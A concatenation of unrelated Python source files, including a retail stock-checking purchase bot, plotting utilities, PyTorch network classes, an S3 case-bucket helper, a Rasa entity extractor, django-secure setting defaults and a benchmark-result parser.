if (USE_BSTBUY) :
BSTBUY_SETUP_THREAD.join()
# Checks if the product is in stock
# Returns boolean based on which bot has the item in stock
def stock_check() :
# Loop until product is in stock
while (True) :
AMZN_STOCK = AMAZON.check_in_stock()
BB_STOCK = BESTBUY.check_in_stock()
# If Amzn product is in stock
if (AMZN_STOCK) :
AMAZON.add_to_cart()
BESTBUY.close()
return True
# If BstBuy product is in stock
elif (BB_STOCK) :
BESTBUY.add_to_cart()
AMAZON.close()
return False
# If neither are in stock, sleep
else :
print("Sleeping " + os.getenv("page_refresh_timer") + " seconds...")
time.sleep(int(os.getenv("page_refresh_timer")))
# Runs setup, checks if the item is in stock, then purchases product
def main() :
setup()
check = stock_check()
if (check) :
AMAZON.checkout()
else :
BESTBUY.checkout()
# -------------------------
# Run
main()
|
157447
|
import numpy as np
import torch
import torchvision.utils as vutils
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
#import pandas as pd
import seaborn as sns
sns.set()
sns.set_style('whitegrid')
sns.set_palette('colorblind')
def convert_npimage_torchimage(image):
return 255*torch.transpose(torch.transpose(torch.from_numpy(image), 0, 2), 1, 2)
def get_scatter_plot(data, labels=None, n_classes=None, num_samples=1000, xlim=None, ylim=None):
'''
data : 2d points, batch_size x data_dim (numpy array)
labels : labels, batch_size (numpy array)
'''
batch_size, data_dim = data.shape
num_samples = min(num_samples, batch_size)
if labels is None:
labels = np.zeros(batch_size, dtype=np.int)
if n_classes is None:
n_classes = len(np.unique(labels))
# sub-samples
if num_samples != batch_size:
indices = np.random.permutation(batch_size)
data = data[indices[:num_samples]]
labels = labels[indices[:num_samples]]
# init config
palette = sns.color_palette(n_colors=n_classes)
palette = [palette[i] for i in np.unique(labels)]
# plot
fig, ax = plt.subplots(figsize=(5, 5))
data = {'x': data[:, 0],
'y': data[:, 1],
'class': labels}
sns.scatterplot(x='x', y='y', hue='class', data=data, palette=palette)
# set config
if xlim is not None:
plt.xlim((-xlim, xlim))
if ylim is not None:
plt.ylim((-ylim, ylim))
# draw to canvas
fig.canvas.draw() # draw the canvas, cache the renderer
image = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='')
image = image.reshape(fig.canvas.get_width_height()[::-1] + (3,))
# close figure
plt.close()
return image
def get_data_for_quiver_plot(val, num):
_x = np.linspace(-val, val, num)
_y = np.linspace(-val, val, num)
_u, _v = np.meshgrid(_x, _y)
_vis_data = np.stack([_u.reshape(num**2), _v.reshape(num**2)], axis=1)
vis_data = torch.from_numpy(_vis_data).float()
return vis_data, _x, _y
def get_quiver_plot(vec, x_pos, y_pos, xlim=None, ylim=None, scale=None):
'''
vec : 2d points, batch_size x data_dim (numpy array)
pos : 2d points, batch_size x data_dim (numpy array)
'''
grid_size = x_pos.shape[0]
batch_size = vec.shape[0]
assert batch_size == grid_size**2
assert y_pos.shape[0] == grid_size
# get x, y, u, v
X = x_pos #np.arange(-10, 10, 1)
Y = y_pos #np.arange(-10, 10, 1)
#U, V = np.meshgrid(X, Y)
U = vec[:, 0].reshape(grid_size, grid_size)
V = vec[:, 1].reshape(grid_size, grid_size)
# plot
fig, ax = plt.subplots(figsize=(5, 5))
q = ax.quiver(X, Y, U, V, pivot='mid', scale=scale)
#ax.quiverkey(q, X=0.3, Y=1.1, U=10,
# label='Quiver key, length = 10', labelpos='E')
# set config
if xlim is not None:
plt.xlim((-xlim, xlim))
if ylim is not None:
plt.ylim((-ylim, ylim))
# tight
plt.tight_layout()
# draw to canvas
fig.canvas.draw() # draw the canvas, cache the renderer
image = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='')
image = image.reshape(fig.canvas.get_width_height()[::-1] + (3,))
# close figure
plt.close()
return image
def get_data_for_heatmap(val=4, num=256):
_x = np.linspace(-val, val, num)
_y = np.linspace(-val, val, num)
_u, _v = np.meshgrid(_x, _y)
_data = np.stack([_u.reshape(num**2), _v.reshape(num**2)], axis=1)
return _data, _x, _y
def energy_to_unnormalized_prob(energy):
prob = torch.exp(-energy) # unnormalized prob
return prob
def get_prob_from_energy_func_for_vis(energy_func, val=4, num=256):
# get grid
_z, _, _ = get_data_for_heatmap(val=val, num=num)
z = torch.from_numpy(_z).float()
# run energy func
energy = energy_func(z)
prob = energy_to_unnormalized_prob(energy)
# convert to numpy array
_prob = prob.cpu().float().numpy()
_prob = _prob.reshape(num, num)
return _prob
def get_imshow_plot(prob, val=4, use_grid=True):
# plot
fig, ax = plt.subplots(figsize=(5, 5))
im = ax.imshow(prob, cmap='jet', extent=[-val, val, -val, val])
ax.grid(False)
if use_grid:
plt.xticks(np.arange(-val, val+1, step=1))
plt.yticks(np.arange(-val, val+1, step=1))
else:
plt.xticks([])
plt.yticks([])
# tight
plt.tight_layout()
# draw to canvas
fig.canvas.draw() # draw the canvas, cache the renderer
image = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='')
image = image.reshape(fig.canvas.get_width_height()[::-1] + (3,))
# close figure
plt.close()
return image
def get_1d_histogram_plot(data, val=4, num=256, use_grid=True):
xmin = 0
xmax = val
# get data
x = data
# get histogram
hist, xedges = np.histogram(x, range=[xmin, xmax], bins=num)
# plot heatmap
fig, ax = plt.subplots(figsize=(5, 5))
im = ax.bar(xedges[:-1], hist, width=0.5)#, color='#0504aa',alpha=0.7)
ax.grid(False)
if use_grid:
plt.xticks(np.arange(0, val+1, step=1))
else:
plt.xticks([])
# tight
plt.tight_layout()
# draw to canvas
fig.canvas.draw() # draw the canvas, cache the renderer
image = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='')
image = image.reshape(fig.canvas.get_width_height()[::-1] + (3,))
# close figure
plt.close()
return image
def get_2d_histogram_plot(data, val=4, num=256, use_grid=True):
xmin = -val
xmax = val
ymin = -val
ymax = val
# get data
x = data[:, 0]
y = data[:, 1]
# get histogram
heatmap, xedges, yedges = np.histogram2d(x, y, range=[[xmin, xmax], [ymin, ymax]], bins=num)
extent = [xedges[0], xedges[-1], yedges[0], yedges[-1]]
# plot heatmap
fig, ax = plt.subplots(figsize=(5, 5))
im = ax.imshow(heatmap.T, extent=extent, cmap='jet')
ax.grid(False)
if use_grid:
plt.xticks(np.arange(-val, val+1, step=1))
plt.yticks(np.arange(-val, val+1, step=1))
else:
plt.xticks([])
plt.yticks([])
# tight
plt.tight_layout()
# draw to canvas
fig.canvas.draw() # draw the canvas, cache the renderer
image = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='')
image = image.reshape(fig.canvas.get_width_height()[::-1] + (3,))
# close figure
plt.close()
return image
def get_grid_image(input, batch_size, nchannels, nheight, nwidth=None, ncol=8, pad_value=0, do_square=True):
'''
input : b x c x h x w (where h = w)
'''
if batch_size > ncol**2 and do_square:
input = input[:ncol**2, :, :, :]
batch_size = ncol**2
nwidth = nwidth if nwidth is not None else nheight
input = input.detach()
output = input.view(batch_size, nchannels, nheight, nwidth).clone().cpu()
output = vutils.make_grid(output, nrow=ncol, normalize=True, scale_each=True, pad_value=pad_value)
#output = vutils.make_grid(output, normalize=False, scale_each=False)
return output
#def get_canvas(fig):
# fig.canvas.draw() # draw the canvas, cache the renderer
# image = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='')
# image = image.reshape(fig.canvas.get_width_height()[::-1] + (3,))
# return image
# # close figure
# plt.close()
#
#def get_contour_with_batch_size(model, batch_size=128, vmin=-10.0, vmax=10.0, title=None):
# model.eval()
# matplotlib.rcParams['xtick.direction'] = 'out'
# matplotlib.rcParams['ytick.direction'] = 'out'
# matplotlib.rcParams['contour.negative_linestyle'] = 'solid'
#
# # tmp
# weight = next(model.parameters())
#
# # gen grid⋅
# delta = 0.1
# xv, yv = torch.meshgrid([torch.arange(vmin, vmax, delta), torch.arange(vmin, vmax, delta)])
# h = yv.size(0)
# w = xv.size(0)
# yv = yv.contiguous().view(-1)
# xv = xv.contiguous().view(-1)
# input = torch.cat([xv.unsqueeze(1), yv.unsqueeze(1)], dim=1).to(weight.device)
#
# # forward
# prob = model.prob(input, batch_size=batch_size)
#
# # convert torch variable to numpy array
# xv = xv.cpu().numpy().reshape(h, w)
# yv = yv.cpu().numpy().reshape(h, w)
# zv = prob.detach().cpu().numpy().reshape(h, w)
#
# # plot and save⋅
# fig = plt.figure()
# CS1 = plt.contourf(xv, yv, zv)
# CS2 = plt.contour(xv, yv, zv, alpha=.7, colors='k')
# plt.clabel(CS2, inline=1, fontsize=10, colors='k')
# #plt.title('Simplest default with labels')
# if title is not None:
# plt.title(title)
# #plt.savefig(filename)
# #plt.close()
# image = get_canvas(fig)
# plt.close()
#
# return image
#
##def get_contour_with_data(model, data, vmin=-10.0, vmax=10.0, title=None):
## model.eval()
## matplotlib.rcParams['xtick.direction'] = 'out'
## matplotlib.rcParams['ytick.direction'] = 'out'
## matplotlib.rcParams['contour.negative_linestyle'] = 'solid'
##
## # gen grid⋅
## delta = 0.1
## xv, yv = torch.meshgrid([torch.arange(vmin, vmax, delta), torch.arange(vmin, vmax, delta)])
## h = yv.size(0)
## w = xv.size(0)
## yv = yv.contiguous().view(-1)
## xv = xv.contiguous().view(-1)
## input = torch.cat([xv.unsqueeze(1), yv.unsqueeze(1)], dim=1).to(data.device)
##
## # forward
## prob = model.prob(input, data)
##
## # convert torch variable to numpy array
## xv = xv.cpu().numpy().reshape(h, w)
## yv = yv.cpu().numpy().reshape(h, w)
## zv = prob.detach().cpu().numpy().reshape(h, w)
##
## # plot and save⋅
## fig = plt.figure()
## CS1 = plt.contourf(xv, yv, zv)
## CS2 = plt.contour(xv, yv, zv, alpha=.7, colors='k')
## plt.clabel(CS2, inline=1, fontsize=10, colors='k')
## #plt.title('Simplest default with labels')
## if title is not None:
## plt.title(title)
## #plt.savefig(filename)
## #plt.close()
## image = get_canvas(fig)
## plt.close()
##
## return image
#
#def get_contour_with_z(model, z, vmin=-10.0, vmax=10.0, title=None):
# model.eval()
# matplotlib.rcParams['xtick.direction'] = 'out'
# matplotlib.rcParams['ytick.direction'] = 'out'
# matplotlib.rcParams['contour.negative_linestyle'] = 'solid'
#
# # gen grid⋅
# delta = 0.1
# xv, yv = torch.meshgrid([torch.arange(vmin, vmax, delta), torch.arange(vmin, vmax, delta)])
# h = yv.size(0)
# w = xv.size(0)
# yv = yv.contiguous().view(-1)
# xv = xv.contiguous().view(-1)
# input = torch.cat([xv.unsqueeze(1), yv.unsqueeze(1)], dim=1).to(z.device)
#
# # forward
# prob = model.prob(input, z=z)
#
# # convert torch variable to numpy array
# xv = xv.cpu().numpy().reshape(h, w)
# yv = yv.cpu().numpy().reshape(h, w)
# zv = prob.detach().cpu().numpy().reshape(h, w)
#
# # plot and save⋅
# fig = plt.figure()
# CS1 = plt.contourf(xv, yv, zv)
# CS2 = plt.contour(xv, yv, zv, alpha=.7, colors='k')
# plt.clabel(CS2, inline=1, fontsize=10, colors='k')
# #plt.title('Simplest default with labels')
# if title is not None:
# plt.title(title)
# #plt.savefig(filename)
# #plt.close()
# image = get_canvas(fig)
# plt.close()
#
# return image
|
157458
|
from pyULIS4 import *
import math
# Keep in mind the coordinate system
# starts at (0;0) in the bottom left
# corner, since we are working in an
# OpenGL context.
pool = FThreadPool()
queue = FCommandQueue( pool )
fmt = Format_RGBA8
ctx = FContext( queue, fmt )
canvas = FBlock( 800, 600, fmt )
temp = FBlock( 800, 600, fmt )
elapsed = 0.0
# Called once at the beginning of play.
def start():
global fmt
global ctx
global canvas
# Called every frame during play.
def update( delta ):
global fmt
global ctx
global canvas
global elapsed
elapsed += delta
radius = ( ( math.sin( elapsed / 1 ) + 1 ) * 100 )
eventFill = FEvent()
eventClear = FEvent()
eventCircle = FEvent()
ctx.Fill( canvas, FColor.White, event = eventFill )
ctx.Clear( temp, event = eventClear )
ctx.Finish()
ctx.DrawCircleBresenhamSP( temp, FVec2F( 400, 300 ), radius, FColor.Black, True, waitList = [ eventFill, eventClear ], event = eventCircle )
ctx.Finish()
ctx.Blend( temp, canvas, waitList = [ eventCircle ] )
ctx.Finish()
|
157485
|
import torch
import numpy as np
class FFNet(torch.nn.Module):
"""Simple class to implement a feed-forward neural network in PyTorch.
Attributes:
layers: list of torch.nn.Linear layers to be applied in forward pass.
activation: activation function to be applied between layers.
"""
def __init__(self,shape,activation=None):
"""Constructor for FFNet.
Arguments:
shape: list of ints describing network shape, including input & output size.
activation: a torch.nn function specifying the network activation.
"""
super(FFNet, self).__init__()
self.shape = shape
self.layers = []
self.activation = activation ##TODO(pculbertson): make it possible use >1 activation... maybe? who cares
for ii in range(0,len(shape)-1):
self.layers.append(torch.nn.Linear(shape[ii],shape[ii+1]))
self.layers = torch.nn.ModuleList(self.layers)
def forward(self, x):
"Performs a forward pass on x, a numpy array of size (-1,shape[0])"
for ii in range(0,len(self.layers)-1):
x = self.layers[ii](x)
if self.activation:
x = self.activation(x)
return self.layers[-1](x)
class CNNet(torch.nn.Module):
"""PyTorch Module which implements a combined CNN-feedforward network for node classification.
Attributes:
conv_layers: ModuleList of Conv2d layers for CNN forward pass.
ff_layers: ModuleList of Linear layers for feedforward pass.
pool_layers: ModuleList of MaxPool2d layers for CNN forward pass. Contains Nones if no pooling.
kernel: list of kernel sizes for CNN layers.
stride: list of strides for CNN layers.
padding: list of paddings for CNN layers.
conv_activation: activation function to be applied between CNN layers
ff_activation: activation function to be applied between feedforward layers.
"""
def __init__(self,num_features,channels,ff_shape, input_size, kernel=2,stride=2, padding=0,
conv_activation=None,ff_activation=None,pool=None):
"""Constructor for CNNet.
Arguments:
num_features: length of node feature vector.
channels: vector of length N+1 specifying # of channels for each convolutional layer,
where N is number of conv layers. channels[0] should be the size of the input image.
ff_shape: vector specifying shape of feedforward network. ff_shape[0] should be
the size of the first hidden layer; constructor does the math to determine ff input size.
input_size: tuple of input image size, (W1, H1)
kernel: vector (or scalar) of kernel sizes for each conv layer. if scalar, each layer
uses the same kernel.
stride: vector (or scalar) of strides for each conv layer. uniform stride if scalar.
padding: vector (or scalar) of paddings for each conv layer. uniform if scalar.
conv_activation: nonlinear activation to be used after each conv layer
ff_activation: nonlinear activation to be used after each ff layer
pool: pooling to be added after each layer. if None, no pooling. if scalar, same pooling for each layer.
"""
super(CNNet, self).__init__()
N = len(channels)-1 #number of conv layers
if type(kernel) is int:
self.kernel = [kernel]*N
if type(stride) is int:
self.stride = [stride]*N
if type(padding) is int:
self.padding = [padding]*N
if not pool or len(pool)==1:
self.pool = [pool]*N
self.conv_activation = conv_activation
self.ff_activation = ff_activation
self.conv_layers = []
self.pool_layers = []
self.ff_layers = []
W, H = input_size
for ii in range(0,len(channels)-1):
self.conv_layers.append(torch.nn.Conv2d(channels[ii],channels[ii+1],self.kernel[ii],
stride=self.stride[ii],padding=self.padding[ii]))
W = int(1+(W-self.kernel[ii]+2*self.padding[ii])/self.stride[ii])
H = int(1+(H-self.kernel[ii]+2*self.padding[ii])/self.stride[ii])
if self.pool[ii]:
if W % self.pool[ii] != 0 or H % self.pool[ii] != 0:
raise ValueError('trying to pool by non-factor')
W, H = W/self.pool[ii], H/self.pool[ii]
self.pool_layers.append(torch.nn.MaxPool2d(self.pool[ii]))
else:
self.pool_layers.append(None)
cnn_output_size = W*H*channels[-1]+num_features
shape = np.concatenate(([cnn_output_size], ff_shape))
for ii in range(0,len(shape)-1):
self.ff_layers.append(torch.nn.Linear(shape[ii],shape[ii+1]))
self.conv_layers = torch.nn.ModuleList(self.conv_layers)
self.ff_layers = torch.nn.ModuleList(self.ff_layers)
if pool:
self.pool_layers = torch.nn.ModuleList(self.pool_layers)
def forward(self, image_batch, feature_batch):
"""Performs a network forward pass on images/features. Images go through CNN, these features are
concatenated with the real-valued features, and passed through feed-forward network.
Arguments:
image_batch: batch of images (as a torch.Tensor of floats) to be passed through, of size [B,W1,H1,C1],
where B is the batch_size, (W1,H1) and C1 are the input_size and channels[0] passed during initialization.
feature_batch: batch of real-valued features (torch.Tensor of floats), of size [B,N], where N is the num_features
passed during initialization.
Usage: cnn = CNNet(...); outs = cnn(images_in,features_in)
"""
x = image_batch
for ii in range(0,len(self.conv_layers)):
x = self.conv_layers[ii](x)
if self.conv_activation:
x = self.conv_activation(x)
if self.pool_layers[ii]:
x = self.pool_layers[ii](x)
x = torch.flatten(x,start_dim=1)
x = torch.cat((x,feature_batch),dim=1)
for ii in range(0,len(self.ff_layers)-1):
x = self.ff_layers[ii](x)
if self.ff_activation:
x = self.ff_activation(x)
return self.ff_layers[-1](x)
|
157528
|
from library.api.db import EntityModel, db
class JobsRecord(EntityModel):
ACTIVE = 0
DISABLE = 1
job_id = db.Column(db.String(100)) # Job id
result = db.Column(db.String(1000)) # Job 结果
log = db.Column(db.Text) # Job log
|
157574
|
import uuid
"""Class to create the cases s3 bucket for asset storage"""
class CaseBucket(object):
def __init__(self, case_number, region, client, resource):
self.region = region
self.case_number = case_number
self.client = client
self.s3 = resource.connect()
self.bucket = self.find_or_create_by()
def find_or_create_by(self):
bucket = self._locate_bucket()
if bucket is not None:
return bucket
else:
self.bucket_name = self._generate_name()
bucket = self._create_s3_bucket()
self._set_acls(self.bucket_name)
self._set_tags(self.bucket_name)
self._set_versioning(self.bucket_name)
return bucket
pass
def cleanup_empty_buckets(self):
buckets = self.client.list_buckets()
for bucket in buckets['Buckets']:
if str(bucket['Name']).find('cloud-response') != -1:
try:
self.client.delete_bucket(Bucket=bucket['Name'])
print(bucket['Name'])
except Exception:
pass
def _generate_name(self):
bucket_name = 'cloud-response-' + str(uuid.uuid4()).replace('-', '')
return bucket_name
def _create_s3_bucket(self):
# the if statement is to prevent
# a fun little bug https://github.com/boto/boto3/issues/125
if self.region == 'us-east-1':
bucket = self.s3.create_bucket(
Bucket=self.bucket_name
)
else:
bucket = self.s3.create_bucket(
Bucket=self.bucket_name,
CreateBucketConfiguration={
'LocationConstraint': self.region
}
)
return bucket
def _set_acls(self, bucket_name):
self.s3.BucketAcl(bucket_name).put(ACL='bucket-owner-full-control')
def _set_tags(self, bucket_name):
self.client.put_bucket_tagging(
Bucket=bucket_name,
Tagging=dict(
TagSet=[
dict(
Key='cr-case-number',
Value=self.case_number
)
]
)
)
def _set_versioning(self, bucket_name):
self.client.put_bucket_versioning(
Bucket=bucket_name,
VersioningConfiguration=dict(
MFADelete='Disabled',
Status='Enabled'
)
)
def _locate_bucket(self):
buckets = self.s3.buckets.all()
for bucket in buckets:
if bucket.name.startswith("cloud-response-"):
tags = self._get_bucket_tags(bucket.name)
if self._check_tags(tags):
case_bucket = bucket
return case_bucket
else:
return None
else:
pass
def _get_bucket_tags(self, bucket):
try:
s3 = self.client
response = s3.get_bucket_tagging(
Bucket=bucket,
)
except Exception:
response = None
return response
def _check_tags(self, tag_object):
if tag_object is None:
return False
elif tag_object.get('TagSet', None) is not None:
for tag in tag_object['TagSet']:
if tag['Value'] == self.case_number:
return True
else:
return False
else:
return False
|
157603
|
import logging
import os
import requests
from typing import Any, List, Optional, Text, Dict
import rasa.utils.endpoints as endpoints_utils
from rasa.shared.nlu.constants import ENTITIES, TEXT
from rasa.nlu.config import RasaNLUModelConfig
from rasa.nlu.extractors.extractor import EntityExtractor
from rasa.nlu.model import Metadata
from rasa.shared.nlu.training_data.message import Message
import rasa.shared.utils.io
logger = logging.getLogger(__name__)
def convert_recognizers_format_to_rasa(
matches: List[Dict[Text, Any]]
) -> List[Dict[Text, Any]]:
extracted = []
for match in matches:
entity = {
"start": match["start"],
"end": match["end"],
"text": match["text"],
"value": match.get("resolution", {}).get("value"),
"confidence": 1.0,
"additional_info": match["resolution"],
"entity": match["typeName"],
}
extracted.append(entity)
return extracted
class RecognizersServiceEntityExtractor(EntityExtractor):
"""Searches for structured entites, e.g. dates, using recognizers-service."""
defaults = {
# by default all entities recognized by recognizers-service are returned
# entities can be configured to contain an array of strings
# with the names of the entities to filter for
"entities": None,
# by default all units are returned
# units can be configured to contain an array of strings
# with the names of the units to filter for
"units": None,
# http url of the running recognizers-service
"url": None,
# culture - if not set, we will use English (en-us)
"culture": 'en-us',
# a flag to have the service return original numbers in the resolution
"show_numbers": True,
# a flag to have the service merge overlapping entities
"merge_results": True,
# Timeout for receiving response from http url of the running recognizers-service
# if not set the default timeout of recognizers-service url is set to 3 seconds.
"timeout": 3,
}
def __init__(
self,
component_config: Optional[Dict[Text, Any]] = None,
) -> None:
super().__init__(component_config)
@classmethod
def create(
cls, component_config: Dict[Text, Any], config: RasaNLUModelConfig
) -> "RecognizersServiceEntityExtractor":
return cls(component_config)
def _url(self) -> Optional[Text]:
"""Return url of recoginzers-service. Environment var will override."""
if os.environ.get("RECOGNIZERS_SERVICE_URL"):
return os.environ["RECOGNIZERS_SERVICE_URL"]
return self.component_config.get("url")
def _payload(self, text: Text) -> Dict[Text, Any]:
return {
"text": text,
"culture": self.component_config.get("culture"),
"entities": self.component_config.get("entities"),
"units": self.component_config.get("units"),
"showNumbers": self.component_config.get("show_numbers"),
"mergeResults": self.component_config.get("merge_results"),
}
def _recognizers_parse(self, text: Text) -> List[Dict[Text, Any]]:
"""Sends the request to recognizers-service and parses the result.
Args:
text: Text for recognizers-service server to parse.
reference_time: Reference time in milliseconds.
Returns:
JSON response from recognizers-service with parse data.
"""
try:
payload = self._payload(text)
headers = {
"Content-Type": "application/json"
}
response = requests.post(
self._url(),
json=payload,
headers=headers,
timeout=self.component_config.get("timeout"),
)
if response.status_code == 200:
return response.json()
else:
logger.error(
f"Failed to get a proper response from remote "
f"recognizers-service at '{parse_url}. Status Code: {response.status_code}. Response: {response.text}"
)
return []
except (
requests.exceptions.ConnectionError,
requests.exceptions.ReadTimeout,
) as e:
logger.error(
"Failed to connect to recognizers-service. Make sure "
"the recognizers-service is running/healthy/not stale and the proper host "
"and port are set in the configuration. More "
"information on how to run the server can be found on "
"github: "
"https://github.com/xanthous-tech/recognizers-service "
"Error: {}".format(e)
)
return []
def process(self, message: Message, **kwargs: Any) -> None:
if self._url() is not None:
matches = self._recognizers_parse(message.get(TEXT))
all_extracted = convert_recognizers_format_to_rasa(matches)
entities = self.component_config["entities"]
extracted = RecognizersServiceEntityExtractor.filter_irrelevant_entities(
all_extracted, entities
)
else:
extracted = []
rasa.shared.utils.io.raise_warning(
"recognizers-service component in pipeline, but no "
"`url` configuration in the config "
"file nor is `RECOGNIZERS_SERVICE_URL` "
"set as an environment variable. No entities will be extracted!",
docs="https://github.com/xanthous-tech/recognizers-service",
)
extracted = self.add_extractor_name(extracted)
message.set(ENTITIES, message.get(ENTITIES, []) + extracted, add_to_output=True)
@classmethod
def load(
cls,
meta: Dict[Text, Any],
model_dir: Text = None,
model_metadata: Optional[Metadata] = None,
cached_component: Optional["RecognizersServiceEntityExtractor"] = None,
**kwargs: Any,
) -> "RecognizersServiceEntityExtractor":
return cls(meta)
|
157649
|
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
class Configuration(object):
def __init__(self, **kwargs):
self.defaults = kwargs
def __getattr__(self, k):
try:
return getattr(settings, k)
except AttributeError:
if k in self.defaults:
return self.defaults[k]
raise ImproperlyConfigured("django-secure requires %s setting." % k)
conf = Configuration(
SECURE_HSTS_SECONDS=0,
SECURE_HSTS_INCLUDE_SUBDOMAINS=False,
SECURE_FRAME_DENY=False,
SECURE_CONTENT_TYPE_NOSNIFF=False,
SECURE_BROWSER_XSS_FILTER=False,
SECURE_SSL_REDIRECT=False,
SECURE_SSL_HOST=None,
SECURE_REDIRECT_EXEMPT=[],
SECURE_PROXY_SSL_HEADER=None,
SECURE_CHECKS=[
"djangosecure.check.csrf.check_csrf_middleware",
"djangosecure.check.sessions.check_session_cookie_secure",
"djangosecure.check.sessions.check_session_cookie_httponly",
"djangosecure.check.djangosecure.check_security_middleware",
"djangosecure.check.djangosecure.check_sts",
"djangosecure.check.djangosecure.check_sts_include_subdomains",
"djangosecure.check.djangosecure.check_frame_deny",
"djangosecure.check.djangosecure.check_content_type_nosniff",
"djangosecure.check.djangosecure.check_xss_filter",
"djangosecure.check.djangosecure.check_ssl_redirect",
"djangosecure.check.djangosecure.check_secret_key",
]
)
|
157659
|
import gc
import os
import logging
import numpy as np
import tensorflow as tf
from nlp_toolkit.classifier import Classifier
from nlp_toolkit.labeler import Labeler
from nlp_toolkit.data import Dataset
from nlp_toolkit.config import YParams
logging.basicConfig(level=logging.INFO)
try:
import GPUtil
from keras.backend.tensorflow_backend import set_session
num_all_gpu = len(GPUtil.getGPUs())
avail_gpu = GPUtil.getAvailable(order='memory')
num_avail_gpu = len(avail_gpu)
gpu_no = str(avail_gpu[0])
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
os.environ['CUDA_VISIBLE_DEVICES'] = gpu_no
logging.info('Choose the most free GPU: %s, currently not support multi-gpus' % gpu_no)
tf_config = tf.ConfigProto()
tf_config.gpu_options.allow_growth = True
set_session(tf.Session(config=tf_config))
except FileNotFoundError:
logging.info('nvidia-smi is missing, often means no gpu on this machine. '
'fall back to cpu!')
gc.disable()
|
157680
|
class Solution:
def shortestWordDistance(self, words, word1, word2):
i1 = i2 = -1
res, same = float("inf"), word1 == word2
for i, w in enumerate(words):
if w == word1:
if same: i2 = i1
i1 = i
if i2 >= 0: res = min(res, i1 - i2)
elif w == word2:
i2 = i
if i1 >= 0: res = min(res, i2 - i1)
return res
|
157683
|
import os
import re
import glob
import numpy as np
import matplotlib.pylab as plt
import matplotlib
from scipy.spatial import ConvexHull
from scipy.interpolate import interp1d
from itertools import chain, count
from collections import defaultdict
from os import makedirs
from os.path import isdir, isfile, join
from plot_util import *
from plot_other import *
# ------------------------------------------------------------------------------
matplotlib.rcParams['pdf.fonttype'] = 42
matplotlib.rcParams['ps.fonttype'] = 42
method_labels_map = {
'FH': 'FH',
'FH_Minus': 'FH$^-$',
'NH': 'NH',
'FH_wo_S': 'FH-wo-S',
'FH_Minus_wo_S': 'FH$^{-}$-wo-S',
'NH_wo_S': 'NH-wo-S',
'EH': 'EH',
'Orig_EH': 'EH',
'BH': 'BH',
'Orig_BH': 'BH',
'MH': 'MH',
'Orig_MH': 'MH',
'Random_Scan': 'Random-Scan',
'Sorted_Scan': 'Sorted-Scan',
'Linear': 'Linear-Scan'
}
dataset_labels_map = {
'Yelp': 'Yelp',
'Music': 'Music-100',
'GloVe100': 'GloVe',
'Tiny1M': 'Tiny-1M',
'Msong': 'Msong',
'MovieLens150': 'MovieLens',
'Netflix300': 'Netflix',
'Yahoo300': 'Yahoo',
'Mnist': 'Mnist',
'Sift': 'Sift',
'Gaussian': 'Gaussian',
'Gist': 'Gist',
}
# datasets = ['Yelp', 'GloVe100']
datasets = ['Yelp', 'Music', 'GloVe100', 'Tiny1M', 'Msong']
dataset_labels = [dataset_labels_map[dataset] for dataset in datasets]
method_colors = ['red', 'blue', 'green', 'purple', 'deepskyblue', 'darkorange',
'olive', 'deeppink', 'dodgerblue', 'dimgray']
method_markers = ['o', '^', 's', 'd', '*', 'p', 'x', 'v', 'D', '>']
# ------------------------------------------------------------------------------
def calc_width_and_height(n_datasets, n_rows):
'''
calc the width and height of figure
:params n_datasets: number of dataset (integer)
:params n_rows: number of rows (integer)
:returns: width and height of figure
'''
fig_width = 0.55 + 3.333 * n_datasets
fig_height = 0.80 + 2.5 * n_rows
return fig_width, fig_height
# ------------------------------------------------------------------------------
def get_filename(input_folder, dataset_name, method_name):
'''
get the file prefix 'dataset_method'
:params input_folder: input folder (string)
:params dataset_name: name of dataset (string)
:params method_name: name of method (string)
:returns: file prefix (string)
'''
name = '%s%s_%s.out' % (input_folder, dataset_name, method_name)
return name
# ------------------------------------------------------------------------------
def parse_res(filename, chosen_top_k):
'''
parse result and get info such as ratio, qtime, recall, index_size,
chosen_k, and the setting of different methods
BH: m=2, l=8, b=0.90
Indexing Time: 2.708386 Seconds
Estimated Memory: 347.581116 MB
cand=10000
1 5.948251 2.960960 0.000000 0.000000 0.844941
5 4.475743 2.954690 0.400000 0.000200 0.845279
10 3.891794 2.953910 0.900000 0.000899 0.845703
20 3.289422 2.963460 0.950000 0.001896 0.846547
50 2.642880 2.985980 0.900000 0.004478 0.849082
100 2.244649 3.012860 0.800000 0.007922 0.853307
cand=50000
1 3.905541 14.901140 6.000000 0.000120 4.222926
5 2.863510 14.905370 4.800000 0.000480 4.223249
10 2.626913 14.910181 5.300000 0.001061 4.223649
20 2.392440 14.913270 4.850000 0.001941 4.224458
50 2.081206 14.931760 4.560000 0.004558 4.227065
100 1.852284 14.964050 4.500000 0.008987 4.231267
'''
setting_pattern = re.compile(r'\S+\s+.*=.*')
setting_m = re.compile(r'.*(m)=(\d+).*')
setting_l = re.compile(r'.*(l)=(\d+).*')
setting_M = re.compile(r'.*(M)=(\d+).*')
setting_s = re.compile(r'.*(s)=(\d+).*')
setting_b = re.compile(r'.*(b)=(\d+\.\d+).*')
param_settings = [setting_m, setting_l, setting_M, setting_s, setting_b]
index_time_pattern = re.compile(r'Indexing Time: (\d+\.\d+).*')
memory_usage_pattern = re.compile(r'Estimated Memory: (\d+\.\d+).*')
candidate_pattern = re.compile(r'.*cand=(\d+).*')
records_pattern = re.compile(r'(\d+)\s*(\d+\.\d+)\s*(\d+\.\d+)\s*(\d+\.\d+)\s*(\d+\.\d+)\s*(\d+\.\d+)')
params = {}
with open(filename, 'r') as f:
for line in f:
res = setting_pattern.match(line)
if res:
for param_setting in param_settings:
tmp_res = param_setting.match(line)
if tmp_res is not None:
# print(tmp_res.groups())
params[tmp_res.group(1)] = tmp_res.group(2)
# print("setting=", line)
res = index_time_pattern.match(line)
if res:
chosen_k = float(res.group(1))
# print('chosen_k=', chosen_k)
res = memory_usage_pattern.match(line)
if res:
memory_usage = float(res.group(1))
# print('memory_usage=', memory_usage)
res = candidate_pattern.match(line)
if res:
cand = int(res.group(1))
# print('cand=', cand)
